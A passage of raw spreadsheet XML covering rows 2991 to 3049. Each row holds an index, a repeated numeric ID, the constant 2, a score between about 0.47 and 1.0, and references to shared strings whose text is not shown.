      <c r="F2991" t="s">
        <v>5592</v>
      </c>
      <c r="G2991" t="s">
        <v>5912</v>
      </c>
      <c r="H2991" t="s">
        <v>5913</v>
      </c>
    </row>
    <row r="2992" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2992" s="1">
        <v>2990</v>
      </c>
      <c r="B2992">
        <v>3784</v>
      </c>
      <c r="C2992">
        <v>3784</v>
      </c>
      <c r="D2992">
        <v>2</v>
      </c>
      <c r="E2992">
        <v>0.51690000295639038</v>
      </c>
      <c r="F2992" t="s">
        <v>5592</v>
      </c>
      <c r="G2992" t="s">
        <v>5914</v>
      </c>
      <c r="H2992" t="s">
        <v>5915</v>
      </c>
    </row>
    <row r="2993" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2993" s="1">
        <v>2991</v>
      </c>
      <c r="B2993">
        <v>6313</v>
      </c>
      <c r="C2993">
        <v>6313</v>
      </c>
      <c r="D2993">
        <v>2</v>
      </c>
      <c r="E2993">
        <v>0.57700002193450928</v>
      </c>
      <c r="F2993" t="s">
        <v>5592</v>
      </c>
      <c r="G2993" t="s">
        <v>5916</v>
      </c>
      <c r="H2993" t="s">
        <v>5917</v>
      </c>
    </row>
    <row r="2994" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2994" s="1">
        <v>2992</v>
      </c>
      <c r="B2994">
        <v>5526</v>
      </c>
      <c r="C2994">
        <v>5526</v>
      </c>
      <c r="D2994">
        <v>2</v>
      </c>
      <c r="E2994">
        <v>0.9253000020980835</v>
      </c>
      <c r="F2994" t="s">
        <v>5592</v>
      </c>
      <c r="G2994" t="s">
        <v>5918</v>
      </c>
      <c r="H2994" t="s">
        <v>5919</v>
      </c>
    </row>
    <row r="2995" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2995" s="1">
        <v>2993</v>
      </c>
      <c r="B2995">
        <v>3913</v>
      </c>
      <c r="C2995">
        <v>3913</v>
      </c>
      <c r="D2995">
        <v>2</v>
      </c>
      <c r="E2995">
        <v>0.99690002202987671</v>
      </c>
      <c r="F2995" t="s">
        <v>5592</v>
      </c>
      <c r="G2995" t="s">
        <v>5920</v>
      </c>
      <c r="H2995" t="s">
        <v>5921</v>
      </c>
    </row>
    <row r="2996" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2996" s="1">
        <v>2994</v>
      </c>
      <c r="B2996">
        <v>5504</v>
      </c>
      <c r="C2996">
        <v>5504</v>
      </c>
      <c r="D2996">
        <v>2</v>
      </c>
      <c r="E2996">
        <v>0.99809998273849487</v>
      </c>
      <c r="F2996" t="s">
        <v>5592</v>
      </c>
      <c r="G2996" t="s">
        <v>5922</v>
      </c>
      <c r="H2996" t="s">
        <v>5923</v>
      </c>
    </row>
    <row r="2997" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2997" s="1">
        <v>2995</v>
      </c>
      <c r="B2997">
        <v>5660</v>
      </c>
      <c r="C2997">
        <v>5660</v>
      </c>
      <c r="D2997">
        <v>2</v>
      </c>
      <c r="E2997">
        <v>0.99650001525878906</v>
      </c>
      <c r="F2997" t="s">
        <v>5592</v>
      </c>
      <c r="G2997" t="s">
        <v>5924</v>
      </c>
      <c r="H2997" t="s">
        <v>5925</v>
      </c>
    </row>
    <row r="2998" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2998" s="1">
        <v>2996</v>
      </c>
      <c r="B2998">
        <v>3835</v>
      </c>
      <c r="C2998">
        <v>3835</v>
      </c>
      <c r="D2998">
        <v>2</v>
      </c>
      <c r="E2998">
        <v>0.81739997863769531</v>
      </c>
      <c r="F2998" t="s">
        <v>5592</v>
      </c>
      <c r="G2998" t="s">
        <v>5926</v>
      </c>
      <c r="H2998" t="s">
        <v>5927</v>
      </c>
    </row>
    <row r="2999" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A2999" s="1">
        <v>2997</v>
      </c>
      <c r="B2999">
        <v>6334</v>
      </c>
      <c r="C2999">
        <v>6334</v>
      </c>
      <c r="D2999">
        <v>2</v>
      </c>
      <c r="E2999">
        <v>0.80980002880096436</v>
      </c>
      <c r="F2999" t="s">
        <v>5592</v>
      </c>
      <c r="G2999" t="s">
        <v>5928</v>
      </c>
      <c r="H2999" t="s">
        <v>5929</v>
      </c>
    </row>
    <row r="3000" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3000" s="1">
        <v>2998</v>
      </c>
      <c r="B3000">
        <v>3693</v>
      </c>
      <c r="C3000">
        <v>3693</v>
      </c>
      <c r="D3000">
        <v>2</v>
      </c>
      <c r="E3000">
        <v>0.85829997062683105</v>
      </c>
      <c r="F3000" t="s">
        <v>5592</v>
      </c>
      <c r="G3000" t="s">
        <v>5930</v>
      </c>
      <c r="H3000" t="s">
        <v>5931</v>
      </c>
    </row>
    <row r="3001" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3001" s="1">
        <v>2999</v>
      </c>
      <c r="B3001">
        <v>3911</v>
      </c>
      <c r="C3001">
        <v>3911</v>
      </c>
      <c r="D3001">
        <v>2</v>
      </c>
      <c r="E3001">
        <v>0.99239999055862427</v>
      </c>
      <c r="F3001" t="s">
        <v>5592</v>
      </c>
      <c r="G3001" t="s">
        <v>5932</v>
      </c>
      <c r="H3001" t="s">
        <v>5933</v>
      </c>
    </row>
    <row r="3002" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3002" s="1">
        <v>3000</v>
      </c>
      <c r="B3002">
        <v>3909</v>
      </c>
      <c r="C3002">
        <v>3909</v>
      </c>
      <c r="D3002">
        <v>2</v>
      </c>
      <c r="E3002">
        <v>0.68150001764297485</v>
      </c>
      <c r="F3002" t="s">
        <v>5592</v>
      </c>
      <c r="G3002" t="s">
        <v>5934</v>
      </c>
      <c r="H3002" t="s">
        <v>5935</v>
      </c>
    </row>
    <row r="3003" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3003" s="1">
        <v>3001</v>
      </c>
      <c r="B3003">
        <v>5430</v>
      </c>
      <c r="C3003">
        <v>5430</v>
      </c>
      <c r="D3003">
        <v>2</v>
      </c>
      <c r="E3003">
        <v>0.57380002737045288</v>
      </c>
      <c r="F3003" t="s">
        <v>5592</v>
      </c>
      <c r="G3003" t="s">
        <v>5936</v>
      </c>
      <c r="H3003" t="s">
        <v>5937</v>
      </c>
    </row>
    <row r="3004" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3004" s="1">
        <v>3002</v>
      </c>
      <c r="B3004">
        <v>3783</v>
      </c>
      <c r="C3004">
        <v>3783</v>
      </c>
      <c r="D3004">
        <v>2</v>
      </c>
      <c r="E3004">
        <v>0.98900002241134644</v>
      </c>
      <c r="F3004" t="s">
        <v>5592</v>
      </c>
      <c r="G3004" t="s">
        <v>5938</v>
      </c>
      <c r="H3004" t="s">
        <v>5939</v>
      </c>
    </row>
    <row r="3005" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3005" s="1">
        <v>3003</v>
      </c>
      <c r="B3005">
        <v>3704</v>
      </c>
      <c r="C3005">
        <v>3704</v>
      </c>
      <c r="D3005">
        <v>2</v>
      </c>
      <c r="E3005">
        <v>0.70719999074935913</v>
      </c>
      <c r="F3005" t="s">
        <v>5592</v>
      </c>
      <c r="G3005" t="s">
        <v>5940</v>
      </c>
      <c r="H3005" t="s">
        <v>5941</v>
      </c>
    </row>
    <row r="3006" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3006" s="1">
        <v>3004</v>
      </c>
      <c r="B3006">
        <v>5531</v>
      </c>
      <c r="C3006">
        <v>5531</v>
      </c>
      <c r="D3006">
        <v>2</v>
      </c>
      <c r="E3006">
        <v>0.99599999189376831</v>
      </c>
      <c r="F3006" t="s">
        <v>5592</v>
      </c>
      <c r="G3006" t="s">
        <v>5942</v>
      </c>
      <c r="H3006" t="s">
        <v>5943</v>
      </c>
    </row>
    <row r="3007" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3007" s="1">
        <v>3005</v>
      </c>
      <c r="B3007">
        <v>3776</v>
      </c>
      <c r="C3007">
        <v>3776</v>
      </c>
      <c r="D3007">
        <v>2</v>
      </c>
      <c r="E3007">
        <v>0.99500000476837158</v>
      </c>
      <c r="F3007" t="s">
        <v>5592</v>
      </c>
      <c r="G3007" t="s">
        <v>5944</v>
      </c>
      <c r="H3007" t="s">
        <v>5945</v>
      </c>
    </row>
    <row r="3008" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3008" s="1">
        <v>3006</v>
      </c>
      <c r="B3008">
        <v>5410</v>
      </c>
      <c r="C3008">
        <v>5410</v>
      </c>
      <c r="D3008">
        <v>2</v>
      </c>
      <c r="E3008">
        <v>0.99250000715255737</v>
      </c>
      <c r="F3008" t="s">
        <v>5592</v>
      </c>
      <c r="G3008" t="s">
        <v>5946</v>
      </c>
      <c r="H3008" t="s">
        <v>5947</v>
      </c>
    </row>
    <row r="3009" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3009" s="1">
        <v>3007</v>
      </c>
      <c r="B3009">
        <v>5475</v>
      </c>
      <c r="C3009">
        <v>5475</v>
      </c>
      <c r="D3009">
        <v>2</v>
      </c>
      <c r="E3009">
        <v>0.56699997186660767</v>
      </c>
      <c r="F3009" t="s">
        <v>5592</v>
      </c>
      <c r="G3009" t="s">
        <v>5948</v>
      </c>
      <c r="H3009" t="s">
        <v>5949</v>
      </c>
    </row>
    <row r="3010" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3010" s="1">
        <v>3008</v>
      </c>
      <c r="B3010">
        <v>5474</v>
      </c>
      <c r="C3010">
        <v>5474</v>
      </c>
      <c r="D3010">
        <v>2</v>
      </c>
      <c r="E3010">
        <v>0.5932999849319458</v>
      </c>
      <c r="F3010" t="s">
        <v>5592</v>
      </c>
      <c r="G3010" t="s">
        <v>5950</v>
      </c>
      <c r="H3010" t="s">
        <v>5951</v>
      </c>
    </row>
    <row r="3011" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3011" s="1">
        <v>3009</v>
      </c>
      <c r="B3011">
        <v>5639</v>
      </c>
      <c r="C3011">
        <v>5639</v>
      </c>
      <c r="D3011">
        <v>2</v>
      </c>
      <c r="E3011">
        <v>0.99690002202987671</v>
      </c>
      <c r="F3011" t="s">
        <v>5592</v>
      </c>
      <c r="G3011" t="s">
        <v>5952</v>
      </c>
      <c r="H3011" t="s">
        <v>5953</v>
      </c>
    </row>
    <row r="3012" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3012" s="1">
        <v>3010</v>
      </c>
      <c r="B3012">
        <v>3778</v>
      </c>
      <c r="C3012">
        <v>3778</v>
      </c>
      <c r="D3012">
        <v>2</v>
      </c>
      <c r="E3012">
        <v>0.99540001153945923</v>
      </c>
      <c r="F3012" t="s">
        <v>5592</v>
      </c>
      <c r="G3012" t="s">
        <v>5954</v>
      </c>
      <c r="H3012" t="s">
        <v>5955</v>
      </c>
    </row>
    <row r="3013" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3013" s="1">
        <v>3011</v>
      </c>
      <c r="B3013">
        <v>5638</v>
      </c>
      <c r="C3013">
        <v>5638</v>
      </c>
      <c r="D3013">
        <v>2</v>
      </c>
      <c r="E3013">
        <v>0.49790000915527338</v>
      </c>
      <c r="F3013" t="s">
        <v>5592</v>
      </c>
      <c r="G3013" t="s">
        <v>5956</v>
      </c>
      <c r="H3013" t="s">
        <v>5957</v>
      </c>
    </row>
    <row r="3014" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3014" s="1">
        <v>3012</v>
      </c>
      <c r="B3014">
        <v>3836</v>
      </c>
      <c r="C3014">
        <v>3836</v>
      </c>
      <c r="D3014">
        <v>2</v>
      </c>
      <c r="E3014">
        <v>0.6632000207901001</v>
      </c>
      <c r="F3014" t="s">
        <v>5592</v>
      </c>
      <c r="G3014" t="s">
        <v>5958</v>
      </c>
      <c r="H3014" t="s">
        <v>5959</v>
      </c>
    </row>
    <row r="3015" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3015" s="1">
        <v>3013</v>
      </c>
      <c r="B3015">
        <v>5530</v>
      </c>
      <c r="C3015">
        <v>5530</v>
      </c>
      <c r="D3015">
        <v>2</v>
      </c>
      <c r="E3015">
        <v>0.99489998817443848</v>
      </c>
      <c r="F3015" t="s">
        <v>5592</v>
      </c>
      <c r="G3015" t="s">
        <v>5960</v>
      </c>
      <c r="H3015" t="s">
        <v>5961</v>
      </c>
    </row>
    <row r="3016" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3016" s="1">
        <v>3014</v>
      </c>
      <c r="B3016">
        <v>3699</v>
      </c>
      <c r="C3016">
        <v>3699</v>
      </c>
      <c r="D3016">
        <v>2</v>
      </c>
      <c r="E3016">
        <v>0.99930000305175781</v>
      </c>
      <c r="F3016" t="s">
        <v>5592</v>
      </c>
      <c r="G3016" t="s">
        <v>5962</v>
      </c>
      <c r="H3016" t="s">
        <v>5963</v>
      </c>
    </row>
    <row r="3017" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3017" s="1">
        <v>3015</v>
      </c>
      <c r="B3017">
        <v>5473</v>
      </c>
      <c r="C3017">
        <v>5473</v>
      </c>
      <c r="D3017">
        <v>2</v>
      </c>
      <c r="E3017">
        <v>0.8521999716758728</v>
      </c>
      <c r="F3017" t="s">
        <v>5592</v>
      </c>
      <c r="G3017" t="s">
        <v>5964</v>
      </c>
      <c r="H3017" t="s">
        <v>5965</v>
      </c>
    </row>
    <row r="3018" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3018" s="1">
        <v>3016</v>
      </c>
      <c r="B3018">
        <v>3701</v>
      </c>
      <c r="C3018">
        <v>3701</v>
      </c>
      <c r="D3018">
        <v>2</v>
      </c>
      <c r="E3018">
        <v>0.99550002813339233</v>
      </c>
      <c r="F3018" t="s">
        <v>5592</v>
      </c>
      <c r="G3018" t="s">
        <v>5966</v>
      </c>
      <c r="H3018" t="s">
        <v>5967</v>
      </c>
    </row>
    <row r="3019" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3019" s="1">
        <v>3017</v>
      </c>
      <c r="B3019">
        <v>3780</v>
      </c>
      <c r="C3019">
        <v>3780</v>
      </c>
      <c r="D3019">
        <v>2</v>
      </c>
      <c r="E3019">
        <v>0.52359998226165771</v>
      </c>
      <c r="F3019" t="s">
        <v>5592</v>
      </c>
      <c r="G3019" t="s">
        <v>5968</v>
      </c>
      <c r="H3019" t="s">
        <v>5969</v>
      </c>
    </row>
    <row r="3020" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3020" s="1">
        <v>3018</v>
      </c>
      <c r="B3020">
        <v>5529</v>
      </c>
      <c r="C3020">
        <v>5529</v>
      </c>
      <c r="D3020">
        <v>2</v>
      </c>
      <c r="E3020">
        <v>0.99529999494552612</v>
      </c>
      <c r="F3020" t="s">
        <v>5592</v>
      </c>
      <c r="G3020" t="s">
        <v>5970</v>
      </c>
      <c r="H3020" t="s">
        <v>5971</v>
      </c>
    </row>
    <row r="3021" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3021" s="1">
        <v>3019</v>
      </c>
      <c r="B3021">
        <v>5544</v>
      </c>
      <c r="C3021">
        <v>5544</v>
      </c>
      <c r="D3021">
        <v>2</v>
      </c>
      <c r="E3021">
        <v>0.99809998273849487</v>
      </c>
      <c r="F3021" t="s">
        <v>5592</v>
      </c>
      <c r="G3021" t="s">
        <v>5972</v>
      </c>
      <c r="H3021" t="s">
        <v>5973</v>
      </c>
    </row>
    <row r="3022" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3022" s="1">
        <v>3020</v>
      </c>
      <c r="B3022">
        <v>5616</v>
      </c>
      <c r="C3022">
        <v>5616</v>
      </c>
      <c r="D3022">
        <v>2</v>
      </c>
      <c r="E3022">
        <v>0.9966999888420105</v>
      </c>
      <c r="F3022" t="s">
        <v>5592</v>
      </c>
      <c r="G3022" t="s">
        <v>5974</v>
      </c>
      <c r="H3022" t="s">
        <v>5975</v>
      </c>
    </row>
    <row r="3023" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3023" s="1">
        <v>3021</v>
      </c>
      <c r="B3023">
        <v>5618</v>
      </c>
      <c r="C3023">
        <v>5618</v>
      </c>
      <c r="D3023">
        <v>2</v>
      </c>
      <c r="E3023">
        <v>0.49990001320838928</v>
      </c>
      <c r="F3023" t="s">
        <v>5592</v>
      </c>
      <c r="G3023" t="s">
        <v>5976</v>
      </c>
      <c r="H3023" t="s">
        <v>5977</v>
      </c>
    </row>
    <row r="3024" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3024" s="1">
        <v>3022</v>
      </c>
      <c r="B3024">
        <v>6333</v>
      </c>
      <c r="C3024">
        <v>6333</v>
      </c>
      <c r="D3024">
        <v>2</v>
      </c>
      <c r="E3024">
        <v>0.60130000114440918</v>
      </c>
      <c r="F3024" t="s">
        <v>5592</v>
      </c>
      <c r="G3024" t="s">
        <v>5978</v>
      </c>
      <c r="H3024" t="s">
        <v>5979</v>
      </c>
    </row>
    <row r="3025" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3025" s="1">
        <v>3023</v>
      </c>
      <c r="B3025">
        <v>3727</v>
      </c>
      <c r="C3025">
        <v>3727</v>
      </c>
      <c r="D3025">
        <v>2</v>
      </c>
      <c r="E3025">
        <v>0.77990001440048218</v>
      </c>
      <c r="F3025" t="s">
        <v>5592</v>
      </c>
      <c r="G3025" t="s">
        <v>5980</v>
      </c>
      <c r="H3025" t="s">
        <v>5981</v>
      </c>
    </row>
    <row r="3026" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3026" s="1">
        <v>3024</v>
      </c>
      <c r="B3026">
        <v>5404</v>
      </c>
      <c r="C3026">
        <v>5404</v>
      </c>
      <c r="D3026">
        <v>2</v>
      </c>
      <c r="E3026">
        <v>0.98659998178482056</v>
      </c>
      <c r="F3026" t="s">
        <v>5592</v>
      </c>
      <c r="G3026" t="s">
        <v>5982</v>
      </c>
      <c r="H3026" t="s">
        <v>5983</v>
      </c>
    </row>
    <row r="3027" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3027" s="1">
        <v>3025</v>
      </c>
      <c r="B3027">
        <v>5403</v>
      </c>
      <c r="C3027">
        <v>5403</v>
      </c>
      <c r="D3027">
        <v>2</v>
      </c>
      <c r="E3027">
        <v>0.99690002202987671</v>
      </c>
      <c r="F3027" t="s">
        <v>5592</v>
      </c>
      <c r="G3027" t="s">
        <v>5984</v>
      </c>
      <c r="H3027" t="s">
        <v>5985</v>
      </c>
    </row>
    <row r="3028" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3028" s="1">
        <v>3026</v>
      </c>
      <c r="B3028">
        <v>3782</v>
      </c>
      <c r="C3028">
        <v>3782</v>
      </c>
      <c r="D3028">
        <v>2</v>
      </c>
      <c r="E3028">
        <v>0.46610000729560852</v>
      </c>
      <c r="F3028" t="s">
        <v>5592</v>
      </c>
      <c r="G3028" t="s">
        <v>5986</v>
      </c>
      <c r="H3028" t="s">
        <v>5987</v>
      </c>
    </row>
    <row r="3029" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3029" s="1">
        <v>3027</v>
      </c>
      <c r="B3029">
        <v>5407</v>
      </c>
      <c r="C3029">
        <v>5407</v>
      </c>
      <c r="D3029">
        <v>2</v>
      </c>
      <c r="E3029">
        <v>0.8499000072479248</v>
      </c>
      <c r="F3029" t="s">
        <v>5592</v>
      </c>
      <c r="G3029" t="s">
        <v>5988</v>
      </c>
      <c r="H3029" t="s">
        <v>5989</v>
      </c>
    </row>
    <row r="3030" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3030" s="1">
        <v>3028</v>
      </c>
      <c r="B3030">
        <v>4861</v>
      </c>
      <c r="C3030">
        <v>4861</v>
      </c>
      <c r="D3030">
        <v>2</v>
      </c>
      <c r="E3030">
        <v>0.99849998950958252</v>
      </c>
      <c r="F3030" t="s">
        <v>5592</v>
      </c>
      <c r="G3030" t="s">
        <v>5990</v>
      </c>
      <c r="H3030" t="s">
        <v>5991</v>
      </c>
    </row>
    <row r="3031" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3031" s="1">
        <v>3029</v>
      </c>
      <c r="B3031">
        <v>6122</v>
      </c>
      <c r="C3031">
        <v>6122</v>
      </c>
      <c r="D3031">
        <v>2</v>
      </c>
      <c r="E3031">
        <v>0.99629998207092285</v>
      </c>
      <c r="F3031" t="s">
        <v>5592</v>
      </c>
      <c r="G3031" t="s">
        <v>5992</v>
      </c>
      <c r="H3031" t="s">
        <v>5993</v>
      </c>
    </row>
    <row r="3032" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3032" s="1">
        <v>3030</v>
      </c>
      <c r="B3032">
        <v>5670</v>
      </c>
      <c r="C3032">
        <v>5670</v>
      </c>
      <c r="D3032">
        <v>2</v>
      </c>
      <c r="E3032">
        <v>0.47470000386238098</v>
      </c>
      <c r="F3032" t="s">
        <v>5592</v>
      </c>
      <c r="G3032" t="s">
        <v>5994</v>
      </c>
      <c r="H3032" t="s">
        <v>5995</v>
      </c>
    </row>
    <row r="3033" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3033" s="1">
        <v>3031</v>
      </c>
      <c r="B3033">
        <v>5080</v>
      </c>
      <c r="C3033">
        <v>5080</v>
      </c>
      <c r="D3033">
        <v>2</v>
      </c>
      <c r="E3033">
        <v>0.60039997100830078</v>
      </c>
      <c r="F3033" t="s">
        <v>5592</v>
      </c>
      <c r="G3033" t="s">
        <v>5996</v>
      </c>
      <c r="H3033" t="s">
        <v>5997</v>
      </c>
    </row>
    <row r="3034" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3034" s="1">
        <v>3032</v>
      </c>
      <c r="B3034">
        <v>5079</v>
      </c>
      <c r="C3034">
        <v>5079</v>
      </c>
      <c r="D3034">
        <v>2</v>
      </c>
      <c r="E3034">
        <v>0.91100001335144043</v>
      </c>
      <c r="F3034" t="s">
        <v>5592</v>
      </c>
      <c r="G3034" t="s">
        <v>5998</v>
      </c>
      <c r="H3034" t="s">
        <v>5999</v>
      </c>
    </row>
    <row r="3035" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3035" s="1">
        <v>3033</v>
      </c>
      <c r="B3035">
        <v>5792</v>
      </c>
      <c r="C3035">
        <v>5792</v>
      </c>
      <c r="D3035">
        <v>2</v>
      </c>
      <c r="E3035">
        <v>0.50550001859664917</v>
      </c>
      <c r="F3035" t="s">
        <v>5592</v>
      </c>
      <c r="G3035" t="s">
        <v>6000</v>
      </c>
      <c r="H3035" t="s">
        <v>6001</v>
      </c>
    </row>
    <row r="3036" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3036" s="1">
        <v>3034</v>
      </c>
      <c r="B3036">
        <v>5077</v>
      </c>
      <c r="C3036">
        <v>5077</v>
      </c>
      <c r="D3036">
        <v>2</v>
      </c>
      <c r="E3036">
        <v>0.85689997673034668</v>
      </c>
      <c r="F3036" t="s">
        <v>5592</v>
      </c>
      <c r="G3036" t="s">
        <v>6002</v>
      </c>
      <c r="H3036" t="s">
        <v>6003</v>
      </c>
    </row>
    <row r="3037" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3037" s="1">
        <v>3035</v>
      </c>
      <c r="B3037">
        <v>5076</v>
      </c>
      <c r="C3037">
        <v>5076</v>
      </c>
      <c r="D3037">
        <v>2</v>
      </c>
      <c r="E3037">
        <v>0.50720000267028809</v>
      </c>
      <c r="F3037" t="s">
        <v>5592</v>
      </c>
      <c r="G3037" t="s">
        <v>6004</v>
      </c>
      <c r="H3037" t="s">
        <v>6005</v>
      </c>
    </row>
    <row r="3038" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3038" s="1">
        <v>3036</v>
      </c>
      <c r="B3038">
        <v>5075</v>
      </c>
      <c r="C3038">
        <v>5075</v>
      </c>
      <c r="D3038">
        <v>2</v>
      </c>
      <c r="E3038">
        <v>0.66210001707077026</v>
      </c>
      <c r="F3038" t="s">
        <v>5592</v>
      </c>
      <c r="G3038" t="s">
        <v>6006</v>
      </c>
      <c r="H3038" t="s">
        <v>6007</v>
      </c>
    </row>
    <row r="3039" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3039" s="1">
        <v>3037</v>
      </c>
      <c r="B3039">
        <v>4567</v>
      </c>
      <c r="C3039">
        <v>4567</v>
      </c>
      <c r="D3039">
        <v>2</v>
      </c>
      <c r="E3039">
        <v>0.59320002794265747</v>
      </c>
      <c r="F3039" t="s">
        <v>5592</v>
      </c>
      <c r="G3039" t="s">
        <v>6008</v>
      </c>
      <c r="H3039" t="s">
        <v>6009</v>
      </c>
    </row>
    <row r="3040" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3040" s="1">
        <v>3038</v>
      </c>
      <c r="B3040">
        <v>5071</v>
      </c>
      <c r="C3040">
        <v>5071</v>
      </c>
      <c r="D3040">
        <v>2</v>
      </c>
      <c r="E3040">
        <v>0.50010001659393311</v>
      </c>
      <c r="F3040" t="s">
        <v>5592</v>
      </c>
      <c r="G3040" t="s">
        <v>6010</v>
      </c>
      <c r="H3040" t="s">
        <v>6011</v>
      </c>
    </row>
    <row r="3041" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3041" s="1">
        <v>3039</v>
      </c>
      <c r="B3041">
        <v>5967</v>
      </c>
      <c r="C3041">
        <v>5967</v>
      </c>
      <c r="D3041">
        <v>2</v>
      </c>
      <c r="E3041">
        <v>0.68680000305175781</v>
      </c>
      <c r="F3041" t="s">
        <v>5592</v>
      </c>
      <c r="G3041" t="s">
        <v>6012</v>
      </c>
      <c r="H3041" t="s">
        <v>6013</v>
      </c>
    </row>
    <row r="3042" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3042" s="1">
        <v>3040</v>
      </c>
      <c r="B3042">
        <v>5069</v>
      </c>
      <c r="C3042">
        <v>5069</v>
      </c>
      <c r="D3042">
        <v>2</v>
      </c>
      <c r="E3042">
        <v>0.99919998645782471</v>
      </c>
      <c r="F3042" t="s">
        <v>5592</v>
      </c>
      <c r="G3042" t="s">
        <v>6014</v>
      </c>
      <c r="H3042" t="s">
        <v>6015</v>
      </c>
    </row>
    <row r="3043" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3043" s="1">
        <v>3041</v>
      </c>
      <c r="B3043">
        <v>5068</v>
      </c>
      <c r="C3043">
        <v>5068</v>
      </c>
      <c r="D3043">
        <v>2</v>
      </c>
      <c r="E3043">
        <v>0.77009999752044678</v>
      </c>
      <c r="F3043" t="s">
        <v>5592</v>
      </c>
      <c r="G3043" t="s">
        <v>6016</v>
      </c>
      <c r="H3043" t="s">
        <v>6017</v>
      </c>
    </row>
    <row r="3044" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3044" s="1">
        <v>3042</v>
      </c>
      <c r="B3044">
        <v>4573</v>
      </c>
      <c r="C3044">
        <v>4573</v>
      </c>
      <c r="D3044">
        <v>2</v>
      </c>
      <c r="E3044">
        <v>0.9966999888420105</v>
      </c>
      <c r="F3044" t="s">
        <v>5592</v>
      </c>
      <c r="G3044" t="s">
        <v>6018</v>
      </c>
      <c r="H3044" t="s">
        <v>6019</v>
      </c>
    </row>
    <row r="3045" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3045" s="1">
        <v>3043</v>
      </c>
      <c r="B3045">
        <v>5961</v>
      </c>
      <c r="C3045">
        <v>5961</v>
      </c>
      <c r="D3045">
        <v>2</v>
      </c>
      <c r="E3045">
        <v>0.98159998655319214</v>
      </c>
      <c r="F3045" t="s">
        <v>5592</v>
      </c>
      <c r="G3045" t="s">
        <v>6020</v>
      </c>
      <c r="H3045" t="s">
        <v>6021</v>
      </c>
    </row>
    <row r="3046" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3046" s="1">
        <v>3044</v>
      </c>
      <c r="B3046">
        <v>5959</v>
      </c>
      <c r="C3046">
        <v>5959</v>
      </c>
      <c r="D3046">
        <v>2</v>
      </c>
      <c r="E3046">
        <v>0.87349998950958252</v>
      </c>
      <c r="F3046" t="s">
        <v>5592</v>
      </c>
      <c r="G3046" t="s">
        <v>6022</v>
      </c>
      <c r="H3046" t="s">
        <v>6023</v>
      </c>
    </row>
    <row r="3047" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3047" s="1">
        <v>3045</v>
      </c>
      <c r="B3047">
        <v>5062</v>
      </c>
      <c r="C3047">
        <v>5062</v>
      </c>
      <c r="D3047">
        <v>2</v>
      </c>
      <c r="E3047">
        <v>0.99779999256134033</v>
      </c>
      <c r="F3047" t="s">
        <v>5592</v>
      </c>
      <c r="G3047" t="s">
        <v>6024</v>
      </c>
      <c r="H3047" t="s">
        <v>6025</v>
      </c>
    </row>
    <row r="3048" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3048" s="1">
        <v>3046</v>
      </c>
      <c r="B3048">
        <v>4563</v>
      </c>
      <c r="C3048">
        <v>4563</v>
      </c>
      <c r="D3048">
        <v>2</v>
      </c>
      <c r="E3048">
        <v>0.99750000238418579</v>
      </c>
      <c r="F3048" t="s">
        <v>5592</v>
      </c>
      <c r="G3048" t="s">
        <v>6026</v>
      </c>
      <c r="H3048" t="s">
        <v>6027</v>
      </c>
    </row>
    <row r="3049" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A3049" s="1">
        <v>3047</v>
      </c>
      <c r="B3049">
        <v>4561</v>
      </c>
      <c r="C3049">
        <v>4561</v>
      </c>
      <c r="D3049">
        <v>2</v>
      </c>
      <c r="E3049">
        <v>0.99360001087188721</v>
      </c>
      <c r="F3049" t="s">
        <v>5592</v>
      </c>
      <c r="G3049" t="s">
        <v>6028</v>
      </c>
      <c r="H3049" t="s">
        <v>6029</v>
      </c>
    </row>
